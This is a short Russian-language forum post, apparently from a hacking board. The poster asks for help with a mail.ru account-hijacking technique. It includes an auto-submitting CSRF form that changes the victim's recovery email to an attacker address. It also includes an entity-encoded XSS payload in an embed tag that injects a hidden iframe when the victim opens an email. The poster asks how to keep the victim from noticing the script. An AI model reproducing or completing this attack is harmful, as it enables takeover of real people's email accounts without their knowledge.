Здравствуйте!
Помогите разобраться со взломом майл.ру описанным в этой статье http://antichat.ru/txt/hmail/ !!!
Сделал я HTML:

<form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="hacker@antichat.ru">
<input type="hidden" value="Сохранить" name="Save">
</form>
<script>
document.anketa.submit();
</script>


Выложил его на сервак,потом кидаем мудаку этот скрипт:


<embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58status=location;document.getElementById('xxx'). innerHTML='<&#105&#102&#114&#97&#109&#101 src=http://адрес документа/yourscript.html width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0> <p id='xxx'>

Когда отсылаю письмо то вместо ('xxx') в письме появляется ('xxx Как с этим бороться???И как сделать что бы адресат не видел этого скрипта??? И для чего нужен этот URL:http://win.mail.ru/cgi-bin/anketa?pa...er@antichat.ru.
Зарание благодарен за ответы грамотных людей!!!